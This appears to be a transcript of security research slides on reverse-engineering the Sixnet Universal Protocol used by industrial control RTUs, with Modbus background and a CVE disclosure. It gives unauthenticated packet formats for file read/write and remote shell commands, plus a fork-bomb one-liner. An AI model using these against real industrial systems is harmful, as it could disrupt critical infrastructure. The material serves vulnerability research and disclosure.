Sixnet Tools presentation Slight overview of ICS environment The Sixnet Universal Protocol
description
Transcript of Sixnet Tools presentation Slight overview of ICS environment The Sixnet Universal Protocol
Sixnet Tools presentation• Slight overview of ICS environment• The Sixnet Universal Protocol• Fun stuff to do with it
•Some
• NextGen Firewalls• Advanced Persistent Threat• Cloud• IPS/IDS 2.0• MDM• SaaS• IaaS• Google
About Me
• Doctoral Student• Graduate Research Assistant at UofL• Intelligent Systems Research Lab• Bourbon Enthusiast
Sixnet ToolsFor Poking at Sixnet Things
ICS
ControlIndustrial
System
ControlSupervisory
SCADA Networks
AndDataAcquisiti
on
Sixnet I/O ToolkitHMI
Human
MachineInterface
RTU
Remote Terminal Unit
Operator on HMI
RTU
Substation
Modbus op codes
Function type Function name Function code
Data Access
Bit access
Physical Discrete Inputs Read Discrete Inputs 2
Internal Bits or Physical Coils
Read Coils 1Write Single Coil 5
Write Multiple Coils 15
16-bit access
Physical Input Registers Read Input Register 4
Internal Registers or Physical Output Registers
Read Holding Registers 3
Write Single Register 6
Write Multiple Registers 16
Read/Write Multiple Registers 23
Mask Write Register 22Read FIFO Queue 24
File Record AccessRead File Record 20Write File Record 21
Diagnostics
Read Exception Status 7
Diagnostic 8
Get Com Event Counter 11
Get Com Event Log 12Report Slave ID 17Read Device Identification 43
Other Encapsulated Interface Transport 43
Modbus Protocol
• Address 2
• Op code 2
• Data n
• Checksum 2
Problem?
Sixnet Universal Protocol
• Lead 1• Length 1• Destination 1• Source 1• Session 1• Sequence 1• Op Code 1• Data n• CRC 2
Reversing
Blinkenlights
Telnet, FTP
Telnet, FTP
Get File Descriptor
• Op Code 1a• Data 00:03:00:[file path]:00 (read)
03:03:[4-byte file size]:[file path]:00 (write)
Get File Descriptor
• Op Code 01• Data [FD]
File manipulation
• Op Code 1a• Data 06:[FD] (read)
02:[FD]:[4B start]:[2B length]:[data] (write)
File manipulation
• Op Code 01• Data [FD]:[start]:[length]:[data] (read)
00:[FD] (write)
MORE SNIFFING!
Shell Commands
• Op Code d0• Data 1e:01:00:[command]:00
• Op Code 01• Data 00:[length]:[output]
Pseudo-Shell
Furk Bamp
BOOM!BOOM!
BOOM!p(){ p|p& }; p
QUESTIONS?
Reporting
CVE-2013-2802
Sixnet firmware 4.8
• Read coils•Write coils• Read file system•Write file system•Administrative access to the OS
QUESTIONS?
Intelligent Systems Research LabUniversity of Louisvillehttps://code.google.com/p/my-sixnet-tools/
Mehdi [email protected]